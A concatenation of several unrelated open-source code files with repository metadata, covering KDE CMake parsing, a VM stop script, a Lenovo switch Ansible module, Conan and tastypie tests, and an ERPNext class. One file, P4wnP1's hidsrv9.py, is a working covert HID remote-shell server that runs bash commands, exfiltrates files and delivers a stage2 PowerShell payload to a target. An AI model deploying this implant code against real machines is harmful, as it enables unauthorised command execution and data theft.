print(ExtractInstallFiles(filename="/home/sbe/devel/svn/kde/trunk/KDE/kdeedu/marble/src/lib/CMakeLists.txt"))
def foo():
ExtractInstallFiles(input="""
find_package(KDE4 REQUIRED)
include (KDE4Defaults)
include_directories(${CMAKE_CURRENT_SOURCE_DIR} ${KDEBASE_WORKSPACE_SOURCE_DIR}/libs ${CMAKE_CURRENT_SOURCE_DIR}/.. ${KDE4_INCLUDES} ${OPENGL_INCLUDE_DIR})
add_subdirectory(tests)
add_definitions(-DKDE_DEFAULT_DEBUG_AREA=1209)
########### next target ###############
set(plasmagik_SRCS
packagemetadata.cpp
packagestructure.cpp
package.cpp
)
set(plasma_LIB_SRCS
${plasmagik_SRCS}
abstractrunner.cpp
animationdriver.cpp
animator.cpp
applet.cpp
appletbrowser.cpp
appletbrowser/customdragtreeview.cpp
appletbrowser/kcategorizeditemsview.cpp
appletbrowser/kcategorizeditemsviewdelegate.cpp
appletbrowser/kcategorizeditemsviewmodels.cpp
appletbrowser/openwidgetassistant.cpp
appletbrowser/plasmaappletitemmodel.cpp
configxml.cpp
containment.cpp
corona.cpp
datacontainer.cpp
dataengine.cpp
dataenginemanager.cpp
delegate.cpp
dialog.cpp
extender.cpp
extenderitem.cpp
paintutils.cpp
panelsvg.cpp
plasma.cpp
popupapplet.cpp
private/applethandle.cpp
private/datacontainer_p.cpp
private/desktoptoolbox.cpp
private/nativetabbar.cpp
private/packages.cpp
private/paneltoolbox.cpp
private/toolbox.cpp
private/tooltip.cpp
querymatch.cpp
runnercontext.cpp
runnermanager.cpp
scripting/appletscript.cpp
scripting/dataenginescript.cpp
scripting/runnerscript.cpp
scripting/scriptengine.cpp
service.cpp
servicejob.cpp
svg.cpp
theme.cpp
tooltipmanager.cpp
uiloader.cpp
version.cpp
view.cpp
wallpaper.cpp
widgets/checkbox.cpp
widgets/combobox.cpp
widgets/flash.cpp
widgets/frame.cpp
widgets/groupbox.cpp
widgets/icon.cpp
widgets/label.cpp
widgets/lineedit.cpp
widgets/meter.cpp
widgets/pushbutton.cpp
widgets/radiobutton.cpp
widgets/signalplotter.cpp
widgets/slider.cpp
widgets/tabbar.cpp
widgets/textedit.cpp
widgets/webcontent.cpp
)
kde4_add_ui_files (
plasma_LIB_SRCS
appletbrowser/kcategorizeditemsviewbase.ui
)
if(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
MESSAGE(STATUS "Adding support for OpenGL applets to libplasma")
set(plasma_LIB_SRCS
${plasma_LIB_SRCS}
glapplet.cpp)
endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
kde4_add_library(plasma SHARED ${plasma_LIB_SRCS})
target_link_libraries(plasma ${KDE4_KIO_LIBS} ${KDE4_KFILE_LIBS} ${KDE4_KNEWSTUFF2_LIBS}
${QT_QTUITOOLS_LIBRARY} ${QT_QTWEBKIT_LIBRARY}
${KDE4_THREADWEAVER_LIBRARIES} ${KDE4_SOLID_LIBS} ${X11_LIBRARIES})
if(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
target_link_libraries(plasma ${QT_QTOPENGL_LIBRARY} ${OPENGL_gl_LIBRARY})
endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
set_target_properties(plasma PROPERTIES
VERSION 3.0.0
SOVERSION 3
${KDE4_DISABLE_PROPERTY_}LINK_INTERFACE_LIBRARIES "${KDE4_KDEUI_LIBS}"
)
install(TARGETS plasma ${INSTALL_TARGETS_DEFAULT_ARGS})
########### install files ###############
set(plasmagik_HEADERS
packagemetadata.h
packagestructure.h
package.h
)
install(FILES ${plasmagik_HEADERS} DESTINATION ${INCLUDE_INSTALL_DIR}/plasma/ COMPONENT Devel)
set(plasma_LIB_INCLUDES
abstractrunner.h
animationdriver.h
animator.h
applet.h
appletbrowser.h
configxml.h
containment.h
corona.h
datacontainer.h
dataengine.h
dataenginemanager.h
delegate.h
dialog.h
extender.h
extenderitem.h
paintutils.h
panelsvg.h
plasma.h
plasma_export.h
popupapplet.h
querymatch.h
runnercontext.h
runnermanager.h
service.h
servicejob.h
svg.h
theme.h
tooltipmanager.h
uiloader.h
tooltipmanager.h
version.h
view.h
wallpaper.h)
if(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
set(plasma_LIB_INCLUDES
${plasma_LIB_INCLUDES}
glapplet.h)
endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
install(FILES
${plasma_LIB_INCLUDES}
DESTINATION ${INCLUDE_INSTALL_DIR}/plasma COMPONENT Devel)
install(FILES
widgets/checkbox.h
widgets/combobox.h
widgets/flash.h
widgets/frame.h
widgets/groupbox.h
widgets/icon.h
widgets/label.h
widgets/lineedit.h
widgets/meter.h
widgets/pushbutton.h
widgets/radiobutton.h
widgets/signalplotter.h
widgets/slider.h
widgets/tabbar.h
widgets/textedit.h
widgets/webcontent.h
DESTINATION ${INCLUDE_INSTALL_DIR}/plasma/widgets COMPONENT Devel)
install(FILES
scripting/appletscript.h
scripting/dataenginescript.h
scripting/runnerscript.h
scripting/scriptengine.h
DESTINATION ${INCLUDE_INSTALL_DIR}/plasma/scripting COMPONENT Devel)
install(FILES
includes/AbstractRunner
includes/AnimationDriver
includes/Animator
includes/Applet
includes/AppletBrowser
includes/AppletScript
includes/CheckBox
includes/ComboBox
includes/ConfigXml
includes/Containment
includes/Corona
includes/DataContainer
includes/DataEngine
includes/DataEngineManager
includes/DataEngineScript
includes/Delegate
includes/Dialog
includes/Extender
includes/ExtenderItem
includes/Flash
includes/GroupBox
includes/Icon
includes/Label
includes/LineEdit
includes/Meter
includes/Package
includes/PackageMetadata
includes/PackageStructure
includes/PaintUtils
includes/PanelSvg
includes/Plasma
includes/PopupApplet
includes/PushButton
includes/QueryMatch
includes/RadioButton
includes/RunnerContext
includes/RunnerManager
includes/RunnerScript
includes/ScriptEngine
includes/Service
includes/ServiceJob
includes/SignalPlotter
includes/Slider
includes/Svg
includes/TabBar
includes/TextEdit
includes/ToolTipManager
includes/Theme
includes/UiLoader
includes/View
includes/Version
includes/Wallpaper
includes/WebContent
DESTINATION ${INCLUDE_INSTALL_DIR}/KDE/Plasma COMPONENT Devel)
if(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
install(FILES
includes/GLApplet
DESTINATION ${INCLUDE_INSTALL_DIR}/KDE/Plasma COMPONENT Devel)
endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND)
install(FILES
servicetypes/plasma-animator.desktop
servicetypes/plasma-applet.desktop
servicetypes/plasma-containment.desktop
servicetypes/plasma-dataengine.desktop
servicetypes/plasma-packagestructure.desktop
servicetypes/plasma-runner.desktop
servicetypes/plasma-scriptengine.desktop
servicetypes/plasma-wallpaper.desktop
DESTINATION ${SERVICETYPES_INSTALL_DIR})
install(FILES scripting/plasmoids.knsrc DESTINATION ${CONFIG_INSTALL_DIR})
""")
# Tokenize
#while 1:
# tok = lexer.token()
# if not tok: break # No more input
# print tok
#while 1:
# tok = cmakelexer.lex.token()
# if not tok: break # No more input
# print tok
|
KDE/twine2
|
kbindinggenerator/cmake.py
|
Python
|
lgpl-3.0
| 15,357 | 0.004428 |
import os
import re
import cmd
import sys
import time
import util
host = sys.argv[1]
cmd.run ("virsh shutdown %s"%(host))
while util.vm_is_running(host):
time.sleep(1)
|
alobbs/qvm
|
qvm/qvm-stop.py
|
Python
|
apache-2.0
| 171 | 0.017544 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to Reset to factory settings of Lenovo Switches
# Lenovo Networking
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cnos_factory
author: "Anil Kumar Muraleedharan (@amuraleedhar)"
short_description: Reset the switch's startup configuration to default (factory) on devices running Lenovo CNOS
description:
- This module allows you to reset a switch's startup configuration. The method provides a way to reset the
startup configuration to its factory settings. This is helpful when you want to move the switch to another
topology as a new network device.
This module uses SSH to manage network device configuration.
The results of the operation can be viewed in results directory.
For more information about this module from Lenovo and customizing it usage for your
use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_factory.html)
version_added: "2.3"
extends_documentation_fragment: cnos
options: {}
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_reload. These are written in the main.yml file of the tasks directory.
---
- name: Test Reset to factory
cnos_factory:
host: "{{ inventory_hostname }}"
username: "{{ hostvars[inventory_hostname]['ansible_ssh_user'] }}"
password: "{{ hostvars[inventory_hostname]['ansible_ssh_pass'] }}"
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
outputfile: "./results/test_factory_{{ inventory_hostname }}_output.txt"
'''
RETURN = '''
msg:
description: Success or failure message
returned: always
type: string
sample: "Switch Startup Config is Reset to factory settings"
'''
import sys
try:
import paramiko
HAS_PARAMIKO = True
except ImportError:
HAS_PARAMIKO = False
import time
import socket
import array
import json
import time
import re
try:
from ansible.module_utils.network.cnos import cnos
HAS_LIB = True
except:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
def main():
module = AnsibleModule(
argument_spec=dict(
outputfile=dict(required=True),
host=dict(required=True),
username=dict(required=True),
password=dict(required=True, no_log=True),
enablePassword=dict(required=False, no_log=True),
deviceType=dict(required=True),),
supports_check_mode=False)
username = module.params['username']
password = module.params['password']
enablePassword = module.params['enablePassword']
cliCommand = "save erase \n"
outputfile = module.params['outputfile']
hostIP = module.params['host']
deviceType = module.params['deviceType']
output = ""
if not HAS_PARAMIKO:
module.fail_json(msg='paramiko is required for this module')
# Create instance of SSHClient object
remote_conn_pre = paramiko.SSHClient()
# Automatically add untrusted hosts (make sure okay for security policy in your environment)
remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# initiate SSH connection with the switch
remote_conn_pre.connect(hostIP, username=username, password=password)
time.sleep(2)
# Use invoke_shell to establish an 'interactive session'
remote_conn = remote_conn_pre.invoke_shell()
time.sleep(2)
# Enable and enter configure terminal then send command
output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn)
# Make terminal length = 0
output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn)
# cnos.debugOutput(cliCommand)
# Send the CLi command
output = output + cnos.waitForDeviceResponse(cliCommand, "[n]", 2, remote_conn)
output = output + cnos.waitForDeviceResponse("y" + "\n", "#", 2, remote_conn)
# Save it into the file
file = open(outputfile, "a")
file.write(output)
file.close()
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
module.exit_json(changed=True, msg="Switch Startup Config is Reset to factory settings ")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
|
hryamzik/ansible
|
lib/ansible/modules/network/cnos/cnos_factory.py
|
Python
|
gpl-3.0
| 5,299 | 0.00434 |
import os
import unittest
from conans.client.cache.cache import CONAN_CONF
from conans.client.conf import ConanClientConfigParser
from conans.paths import DEFAULT_PROFILE_NAME
from conans.test.utils.test_files import temp_folder
from conans.util.files import save
default_client_conf = '''[storage]
path: ~/.conan/data
[log]
trace_file = "Path/with/quotes"
[general]
'''
default_profile = '''
[settings]
arch=x86_64
build_type=Release
compiler=gcc
compiler.libcxx=libstdc++
compiler.version=4.9
os=Linux
'''
class ClientConfTest(unittest.TestCase):
def test_quotes(self):
tmp_dir = temp_folder()
save(os.path.join(tmp_dir, CONAN_CONF), default_client_conf)
save(os.path.join(tmp_dir, DEFAULT_PROFILE_NAME), default_profile)
config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF))
self.assertEqual(config.env_vars["CONAN_TRACE_FILE"], "Path/with/quotes")
def test_proxies(self):
tmp_dir = temp_folder()
save(os.path.join(tmp_dir, CONAN_CONF), "")
config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF))
self.assertEqual(None, config.proxies)
save(os.path.join(tmp_dir, CONAN_CONF), "[proxies]")
config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF))
self.assertNotIn("no_proxy", config.proxies)
save(os.path.join(tmp_dir, CONAN_CONF), "[proxies]\nno_proxy=localhost")
config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF))
self.assertEqual(config.proxies["no_proxy"], "localhost")
|
memsharded/conan
|
conans/test/unittests/util/client_conf_test.py
|
Python
|
mit
| 1,569 | 0.001275 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cstr, filter_strip_join
from frappe.website.website_generator import WebsiteGenerator
from frappe.contacts.address_and_contact import load_address_and_contact
class SalesPartner(WebsiteGenerator):
website = frappe._dict(
page_title_field = "partner_name",
condition_field = "show_in_website",
template = "templates/generators/sales_partner.html"
)
def onload(self):
"""Load address and contacts in `__onload`"""
load_address_and_contact(self, "sales_partner")
def autoname(self):
self.name = self.partner_name
def validate(self):
if not self.route:
self.route = "partners/" + self.scrub(self.partner_name)
super(SalesPartner, self).validate()
if self.partner_website and not self.partner_website.startswith("http"):
self.partner_website = "http://" + self.partner_website
def get_context(self, context):
address = frappe.db.get_value("Address",
{"sales_partner": self.name, "is_primary_address": 1},
"*", as_dict=True)
if address:
city_state = ", ".join(filter(None, [address.city, address.state]))
address_rows = [address.address_line1, address.address_line2,
city_state, address.pincode, address.country]
context.update({
"email": address.email_id,
"partner_address": filter_strip_join(address_rows, "\n<br>"),
"phone": filter_strip_join(cstr(address.phone).split(","), "\n<br>")
})
return context
|
vishdha/erpnext
|
erpnext/setup/doctype/sales_partner/sales_partner.py
|
Python
|
gpl-3.0
| 1,584 | 0.024621 |
#!/usr/bin/python
# This file is part of P4wnP1.
#
# Copyright (c) 2017, Marcus Mengs.
#
# P4wnP1 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# P4wnP1 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with P4wnP1. If not, see <http://www.gnu.org/licenses/>.
# Works with SendHID6.ps1
import sys
import struct
import Queue
import subprocess
import thread
import signal
from select import select
import time
chunks = lambda A, chunksize=60: [A[i:i+chunksize] for i in range(0, len(A), chunksize)]
# single packet for a data stream to send
# 0: 1 Byte src
# 1: 1 Byte dst
# 2: 1 Byte snd
# 3: 1 Byte rcv
# 4-63 60 Bytes Payload
# client dst
# 1 stdin
# 2 stdout
# 3 stderr
# reassemable received and enqueue report fragments into full streams (separated by dst/src)
def fragment_rcvd(qin, fragemnt_assembler, src=0, dst=0, data=""):
stream_id = (src, dst)
# if src == dst == 0, ignore (heartbeat)
if (src != 0 or dst !=0):
# check if stream already present
if fragment_assembler.has_key(stream_id):
# check if closing fragment (snd length = 0)
if (len(data) == 0):
# end of stream - add to input queue
stream = [src, dst, fragment_assembler[stream_id][2]]
qin.put(stream)
# delete from fragment_assembler
del fragment_assembler[stream_id]
else:
# append data to stream
fragment_assembler[stream_id][2] += data
#print repr(fragment_assembler[stream_id][2])
else:
# start stream, if not existing
data_arr = [src, dst, data]
fragment_assembler[stream_id] = data_arr
def send_datastream(qout, src=1, dst=1, data=""):
# split data into chunks fitting into packet payload (60 bytes)
chnks = chunks(data)
for chunk in chnks:
data_arr = [src, dst, chunk]
qout.put(data_arr)
# append empty packet to close stream
qout.put([src, dst, ""])
def send_packet(f, src=1, dst=1, data="", rcv=0):
snd = len(data)
#print "Send size: " + str(snd)
packet = struct.pack('!BBBB60s', src, dst, snd, rcv, data)
#print packet.encode("hex")
f.write(packet)
def read_packet(f):
hidin = f.read(0x40)
#print "Input received (" + str(len(hidin)) + " bytes):"
#print hidin.encode("hex")
data = struct.unpack('!BBBB60s', hidin)
src = data[0]
dst = data[1]
snd = data[2]
rcv = data[3]
# reduce msg to real size
msg = data[4][0:snd]
return [src, dst, snd, rcv, msg]
def process_input(qin, subproc):
# HID in loop, should ho to thread
# check if input queue contains data
while True:
if not qin.empty():
input = qin.get()
src=input[0]
dst=input[1]
stream=input[2]
# process received input
# stdin (redirect to bash)
if dst == 1:
command=stream
if command.upper() == "RESET_BASH":
# send sigint to bash
print "Restarting bash process"
reset_bash(subproc)
else:
print "running command '" + command + "'"
run_local_command(command, subproc)
# stdout
elif dst == 2:
print "Data received on stdout"
print stream
pass
# stderr
elif dst == 3:
pass
# getfile
elif dst == 4:
print "Data receiveced on dst=4 (getfile): " + stream
args=stream.split(" ",3)
if (len(args) < 3):
# too few arguments, echo this back with src=2, dst=3 (stderr)
print "To few arguments"
send_datastream(qout, 4, 3, "P4wnP1 received 'getfile' with too few arguments")
# ToDo: files are reassembled here, this code should be moved into a separate method
else:
# check if first word is "getfile" ignore otherwise
if not args[0].strip().lower() == "getfile":
send_datastream(qout, 4, 3, "P4wnP1 received data on dst=4 (getfile) but wrong request format was choosen")
continue
filename = args[1].strip()
varname = args[2].strip()
content = None
# try to open file, send error if not possible
try:
with open(filename, "rb") as f:
content = f.read() # naive approach, reading whole file at once (we split into chunks anyway)
except IOError as e:
# deliver Error to Client errorstream
send_datastream(qout, 4, 3, "Error on getfile: " + e.strerror)
continue
# send header
print "Varname " + str(varname)
send_datastream(qout, 4, 4, "BEGINFILE " + filename + " " + varname)
# send filecontent (sould be chunked into multiple streams, but would need reassembling on layer5)
# note: The client has to read (and recognize) ASCII based header and footer streams, but content could be in binary form
if content == None:
send_datastream(qout, 4, 3, "Error on getfile: No file content read")
else:
#send_datastream(qout, 4, 4, content)
streamchunksize=600
for chunk in chunks(content, streamchunksize):
send_datastream(qout, 4, 4, chunk)
# send footer
send_datastream(qout, 4, 4, "ENDFILE " + filename + " " + varname)
else:
print "Input in input queue:"
print input
def run_local_command(command, bash):
bash = subproc[0]
sin = bash.stdin
sin.write(command + "\n")
sin.flush()
return
def process_bash_output(qout, subproc):
buf = ""
while True:
bash = subproc[0]
outstream = bash.stdout
#print "Reading stdout of bash on " + str(outstream)
# check for output which needs to be delivered from backing bash
try:
r,w,ex = select([outstream], [], [], 0.1)
except ValueError:
# we should land here if the output stream is closed
# because a new bash process was started
pass
if outstream in r:
byte = outstream.read(1)
if byte == "\n":
# full line received from subprocess, send it to HID
# note: the newline char isn't send, as each outputstream is printed in a separate line by the powershell client
# we set src=1 as we receive bash commands on dst=1
# dst = 2 (stdout of client)
send_datastream(qout, 2, 2, buf)
# clear buffer
buf = ""
else:
buf += byte
def process_bash_error(qout, subproc):
buf = ""
while True:
bash = subproc[0]
errstream = bash.stderr
# check for output which needs to be delivered from backing bash stderr
try:
r,w,ex = select([errstream], [], [], 0.1)
except ValueError:
# we should land here if the error stream is closed
# because a new bash process was started
pass
if errstream in r:
byte = errstream.read(1)
if byte == "\n":
# full line received from subprocess, send it to HID
# note: the newline char isn't send, as each outputstream is printed in a separate line by the powershell client
# dst = 3 (stderr of client)
send_datastream(qout, 3, 3, buf)
# clear buffer
buf = ""
else:
buf += byte
# As we don't pipe CTRL+C intterupt from client through
# HID data stream, there has to be another option to reset the bash process if it stalls
# This could easily happen, as we don't support interactive commands, waiting for input
# (this non-interactive shell restriction should be a known hurdle to every pentester out there)
def reset_bash(subproc):
bash = subproc[0]
bash.stdout.close()
bash.kill()
send_datastream(qout, 3, 3, "Bash process terminated")
bash = subprocess.Popen(["bash"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
subproc[0] = bash
if bash.poll() == None:
send_datastream(qout, 3, 3, "New bash process started")
else:
send_datastream(qout, 3, 3, "Restarting bash failed")
# prepare a stream to answer a getfile request
def stream_from_getfile(filename):
with open(filename,"rb") as f:
content = f.read()
return content
# main code
qout = Queue.Queue()
qin = Queue.Queue()
fragment_assembler = {}
bash = subprocess.Popen(["bash"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
subproc = [bash] # packed into array to allow easy "call by ref"
# process input
thread.start_new_thread(process_input, (qin, subproc))
# process output
thread.start_new_thread(process_bash_output, (qout, subproc))
# process error
thread.start_new_thread(process_bash_error, (qout, subproc))
# Initialize stage one payload, carried with heartbeat package in endless loop
with open("stage2.ps1","rb") as f:
stage2=f.read()
#initial_payload="#Hey this is the test data for an initial payload calling get-date on PS\nGet-Date"
stage2_chunks = chunks(stage2)
heartbeat_content = []
heartbeat_content += ["begin_heartbeat"]
heartbeat_content += stage2_chunks
heartbeat_content += ["end_heartbeat"]
heartbeat_counter = 0
with open("/dev/hidg1","r+b") as f:
# send test data stream
send_datastream(qout, 1, 1, "Hello from P4wnP1, this message has been sent through a HID device")
while True:
packet = read_packet(f)
src = packet[0]
dst = packet[1]
snd = packet[2]
rcv = packet[3]
msg = packet[4]
# put packet to input queue
fragment_rcvd(qin, fragment_assembler, src, dst, msg)
#print "Packet received"
#print "SRC: " + str(src) + " DST: " + str(dst) + " SND: " + str(snd) + " RCV: " + str(rcv)
#print "Payload: " + repr(msg)
# send data from output queue (empty packet otherwise)
if qout.empty():
# empty keep alive (rcv field filled)
#send_packet(f=f, src=0, dst=0, data="", rcv=snd)
# as the content "keep alive" packets (src=0, dst=0) is ignored
# by the PowerShell client, we use them to carry the initial payload
# in an endless loop
if heartbeat_counter == len(heartbeat_content):
heartbeat_counter = 0
send_packet(f=f, src=0, dst=0, data=heartbeat_content[heartbeat_counter], rcv=snd)
heartbeat_counter += 1
else:
packet = qout.get()
send_packet(f=f, src=packet[0], dst=packet[1], data=packet[2], rcv=snd)
|
mame82/P4wnP1
|
hidtools/hidsrv9.py
|
Python
|
gpl-3.0
| 10,097 | 0.029712 |
import datetime
from dateutil.tz import tzoffset
from decimal import Decimal
from django.db import models
from django.contrib.auth.models import User
from django.test import TestCase
from django.http import HttpRequest
from tastypie.bundle import Bundle
from tastypie.exceptions import ApiFieldError, NotFound
from tastypie.fields import NOT_PROVIDED, ApiField, BooleanField, CharField,\
DateField, DateTimeField, DecimalField, DictField, FileField, FloatField,\
IntegerField, ListField, TimeField, ToOneField, ToManyField
from tastypie.resources import ModelResource
from tastypie.utils import aware_datetime
from core.models import Note, Subject, MediaBit
from core.tests.mocks import MockRequest
class ApiFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = ApiField()
self.assertEqual(field_1.instance_name, None)
self.assertEqual(field_1.attribute, None)
self.assertEqual(field_1._default, NOT_PROVIDED)
self.assertEqual(field_1.null, False)
self.assertEqual(field_1.help_text, '')
self.assertEqual(field_1.use_in, 'all')
field_2 = ApiField(attribute='foo', default=True, null=True, readonly=True, help_text='Foo.', use_in="foo")
self.assertEqual(field_2.instance_name, None)
self.assertEqual(field_2.attribute, 'foo')
self.assertEqual(field_2._default, True)
self.assertEqual(field_2.null, True)
self.assertEqual(field_2.readonly, True)
self.assertEqual(field_2.help_text, 'Foo.')
self.assertEqual(field_1.use_in, 'all')
field_3 = ApiField(use_in="list")
self.assertEqual(field_3.use_in, 'list')
field_4 = ApiField(use_in="detail")
self.assertEqual(field_4.use_in, 'detail')
def use_in_callable(x):
return True
field_5 = ApiField(use_in=use_in_callable)
self.assertTrue(field_5.use_in is use_in_callable)
def test_dehydrated_type(self):
field_1 = ApiField()
self.assertEqual(field_1.dehydrated_type, 'string')
def test_has_default(self):
field_1 = ApiField()
self.assertEqual(field_1.has_default(), False)
field_2 = ApiField(default=True)
self.assertEqual(field_2.has_default(), True)
def test_default(self):
field_1 = ApiField()
self.assertEqual(isinstance(field_1.default, NOT_PROVIDED), True)
field_2 = ApiField(default=True)
self.assertEqual(field_2.default, True)
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
# With no attribute or default, we should get ``None``.
field_1 = ApiField()
self.assertEqual(field_1.dehydrate(bundle), None)
# Still no attribute, so we should pick up the default
field_2 = ApiField(default=True)
self.assertEqual(field_2.dehydrate(bundle), True)
# Wrong attribute should yield default.
field_3 = ApiField(attribute='foo', default=True)
self.assertEqual(field_3.dehydrate(bundle), True)
# Wrong attribute should yield null.
field_4 = ApiField(attribute='foo', null=True)
self.assertEqual(field_4.dehydrate(bundle), None)
# Correct attribute.
field_5 = ApiField(attribute='title', default=True)
self.assertEqual(field_5.dehydrate(bundle), u'First Post!')
# Correct callable attribute.
field_6 = ApiField(attribute='what_time_is_it', default=True)
self.assertEqual(field_6.dehydrate(bundle), aware_datetime(2010, 4, 1, 0, 48))
def test_convert(self):
field_1 = ApiField()
self.assertEqual(field_1.convert('foo'), 'foo')
self.assertEqual(field_1.convert(True), True)
def test_hydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
# With no value, default or nullable, we should get an ``ApiFieldError``.
field_1 = ApiField()
field_1.instance_name = 'api'
self.assertRaises(ApiFieldError, field_1.hydrate, bundle)
# The default.
field_2 = ApiField(default='foo')
field_2.instance_name = 'api'
self.assertEqual(field_2.hydrate(bundle), 'foo')
# The callable default.
def foo():
return 'bar'
field_3 = ApiField(default=foo)
field_3.instance_name = 'api'
self.assertEqual(field_3.hydrate(bundle), 'bar')
# The nullable case.
field_4 = ApiField(null=True)
field_4.instance_name = 'api'
self.assertEqual(field_4.hydrate(bundle), None)
# The readonly case.
field_5 = ApiField(readonly=True)
field_5.instance_name = 'api'
bundle.data['api'] = 'abcdef'
self.assertEqual(field_5.hydrate(bundle), None)
# A real, live attribute!
field_6 = ApiField(attribute='title')
field_6.instance_name = 'api'
bundle.data['api'] = note.title
self.assertEqual(field_6.hydrate(bundle), u'First Post!')
# Make sure it uses attribute when there's no data
field_7 = ApiField(attribute='title')
field_7.instance_name = 'notinbundle'
self.assertEqual(field_7.hydrate(bundle), u'First Post!')
# Make sure it falls back to instance name if there is no attribute
field_8 = ApiField()
field_8.instance_name = 'title'
self.assertEqual(field_8.hydrate(bundle), u'First Post!')
# Attribute & null regression test.
# First, simulate data missing from the bundle & ``null=True``.
field_9 = ApiField(attribute='notinbundle', null=True)
field_9.instance_name = 'notinbundle'
self.assertEqual(field_9.hydrate(bundle), None)
# The do something in the bundle also with ``null=True``.
field_10 = ApiField(attribute='title', null=True)
field_10.instance_name = 'title'
self.assertEqual(field_10.hydrate(bundle), u'First Post!')
# The blank case.
field_11 = ApiField(attribute='notinbundle', blank=True)
field_11.instance_name = 'notinbundle'
self.assertEqual(field_11.hydrate(bundle), None)
bundle.data['title'] = note.title
field_12 = ApiField(attribute='title', blank=True)
field_12.instance_name = 'title'
self.assertEqual(field_12.hydrate(bundle), u'First Post!')
class CharFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = CharField()
self.assertEqual(field_1.help_text, 'Unicode string data. Ex: "Hello World"')
field_2 = CharField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = CharField()
self.assertEqual(field_1.dehydrated_type, 'string')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = CharField(attribute='title', default=True)
self.assertEqual(field_1.dehydrate(bundle), u'First Post!')
field_2 = CharField(default=20)
self.assertEqual(field_2.dehydrate(bundle), u'20')
class FileFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = FileField()
self.assertEqual(field_1.help_text, 'A file URL as a string. Ex: "http://media.example.com/media/photos/my_photo.jpg"')
field_2 = FileField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = FileField()
self.assertEqual(field_1.dehydrated_type, 'string')
def test_dehydrate(self):
bit = MediaBit.objects.get(pk=1)
bundle = Bundle(obj=bit)
field_1 = FileField(attribute='image', default=True)
self.assertEqual(field_1.dehydrate(bundle), u'http://localhost:8080/media/lulz/catz.gif')
field_2 = FileField(default='http://media.example.com/img/default_avatar.jpg')
self.assertEqual(field_2.dehydrate(bundle), u'http://media.example.com/img/default_avatar.jpg')
bit = MediaBit.objects.get(pk=1)
bit.image = ''
bundle = Bundle(obj=bit)
field_3 = FileField(attribute='image', default=True)
self.assertEqual(field_3.dehydrate(bundle), None)
bit.image = None
bundle = Bundle(obj=bit)
field_4 = FileField(attribute='image', null=True)
self.assertEqual(field_4.dehydrate(bundle), None)
class IntegerFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = IntegerField()
self.assertEqual(field_1.help_text, 'Integer data. Ex: 2673')
field_2 = IntegerField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = IntegerField()
self.assertEqual(field_1.dehydrated_type, 'integer')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = IntegerField(default=25)
self.assertEqual(field_1.dehydrate(bundle), 25)
field_2 = IntegerField(default='20')
self.assertEqual(field_2.dehydrate(bundle), 20)
field_3 = IntegerField(default=18.5)
self.assertEqual(field_3.dehydrate(bundle), 18)
class FloatFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = FloatField()
